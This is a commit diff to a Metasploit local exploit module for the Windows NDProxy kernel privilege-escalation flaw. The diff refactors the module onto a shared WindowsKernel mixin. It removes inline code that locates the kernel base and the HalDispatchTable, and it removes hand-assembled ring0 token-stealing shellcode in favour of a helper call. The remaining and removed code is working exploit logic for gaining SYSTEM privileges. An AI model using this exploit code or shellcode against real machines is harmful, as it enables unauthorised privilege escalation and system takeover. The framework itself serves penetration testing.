Switch ms_ndproxy to use the new WindowsKernel mixin
Spencer McIntyre
parent
58d29167e8
commit
86e2377218
|
|
@ -4,11 +4,13 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/local/windows_kernel'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Local::WindowsKernel
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
|
|
@ -84,63 +86,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'DisclosureDate'=> 'Nov 27 2013',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
|
||||
end
|
||||
|
||||
def add_railgun_functions
|
||||
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
|
||||
session.railgun.add_function(
|
||||
'psapi',
|
||||
'EnumDeviceDrivers',
|
||||
'BOOL',
|
||||
[
|
||||
["PBLOB", "lpImageBase", "out"],
|
||||
["DWORD", "cb", "in"],
|
||||
["PDWORD", "lpcbNeeded", "out"]
|
||||
])
|
||||
session.railgun.add_function(
|
||||
'psapi',
|
||||
'GetDeviceDriverBaseNameA',
|
||||
'DWORD',
|
||||
[
|
||||
["LPVOID", "ImageBase", "in"],
|
||||
["PBLOB", "lpBaseName", "out"],
|
||||
["DWORD", "nSize", "in"]
|
||||
])
|
||||
end
|
||||
|
||||
def open_device(dev)
|
||||
|
||||
invalid_handle_value = 0xFFFFFFFF
|
||||
|
||||
r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
|
||||
|
||||
handle = r['return']
|
||||
|
||||
if handle == invalid_handle_value
|
||||
return nil
|
||||
end
|
||||
|
||||
return handle
|
||||
end
|
||||
|
||||
def find_sys_base(drvname)
|
||||
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
|
||||
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
|
||||
|
||||
addresses.each do |address|
|
||||
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
|
||||
current_drvname = results['lpBaseName'][0..results['return'] - 1]
|
||||
if drvname == nil
|
||||
if current_drvname.downcase.include?('krnl')
|
||||
return [address, current_drvname]
|
||||
end
|
||||
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
|
||||
return [address, current_drvname]
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def ring0_shellcode(t)
|
||||
|
|
@ -148,25 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
|
||||
restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
|
||||
|
||||
tokenstealing = "\x52" # push edx # Save edx on the stack
|
||||
tokenstealing << "\x53" # push ebx # Save ebx on the stack
|
||||
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
|
||||
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
|
||||
tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
|
||||
tokenstealing << "\x8b\xc8" # mov ecx, eax
|
||||
tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
|
||||
tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
|
||||
tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
|
||||
tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
|
||||
tokenstealing << "\x75\xe8" # jne 0000101e ======================
|
||||
tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
|
||||
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
|
||||
tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
|
||||
tokenstealing << "\x5b" # pop ebx # Restores ebx
|
||||
tokenstealing << "\x5a" # pop edx # Restores edx
|
||||
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
|
||||
|
||||
ring0_shellcode = restore_ptrs + tokenstealing
|
||||
ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
|
||||
return ring0_shellcode
|
||||
end
|
||||
|
||||
|
|
@ -211,33 +138,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
def disclose_addresses(t)
|
||||
addresses = {}
|
||||
|
||||
vprint_status("Getting the Kernel module name...")
|
||||
kernel_info = find_sys_base(nil)
|
||||
if kernel_info.nil?
|
||||
vprint_error("Failed to disclose the Kernel module name")
|
||||
return nil
|
||||
end
|
||||
vprint_good("Kernel module found: #{kernel_info[1]}")
|
||||
|
||||
vprint_status("Getting a Kernel handle...")
|
||||
kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
|
||||
kernel32_handle = kernel32_handle['return']
|
||||
if kernel32_handle == 0
|
||||
vprint_error("Failed to get a Kernel handle")
|
||||
return nil
|
||||
end
|
||||
vprint_good("Kernel handle acquired")
|
||||
|
||||
|
||||
vprint_status("Disclosing the HalDispatchTable...")
|
||||
hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
|
||||
hal_dispatch_table = hal_dispatch_table['return']
|
||||
if hal_dispatch_table == 0
|
||||
vprint_error("Failed to disclose the HalDispatchTable")
|
||||
return nil
|
||||
end
|
||||
hal_dispatch_table -= kernel32_handle
|
||||
hal_dispatch_table += kernel_info[0]
|
||||
hal_dispatch_table = find_haldispatchtable
|
||||
return nil if hal_dispatch_table.nil?
|
||||
addresses["halDispatchTable"] = hal_dispatch_table
|
||||
vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
|
||||
|
||||
|
|
@ -257,16 +159,12 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return addresses
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
vprint_status("Adding the railgun stuff...")
|
||||
add_railgun_functions
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
handle = open_device("\\\\.\\NDProxy")
|
||||
handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
|
||||
if handle.nil?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
|
@ -289,10 +187,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
vprint_status("Adding the railgun stuff...")
|
||||
add_railgun_functions
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
|
||||
elsif sysinfo["Architecture"] =~ /x64/
|
||||
|
|
@ -322,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
print_status("Checking device...")
|
||||
handle = open_device("\\\\.\\NDProxy")
|
||||
handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
|
||||
if handle.nil?
|
||||
fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
|
||||
else
|
||||
|
|
@ -409,9 +303,5 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
else
|
||||
fail_with(Failure::Unknown, "Error while executing the payload")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue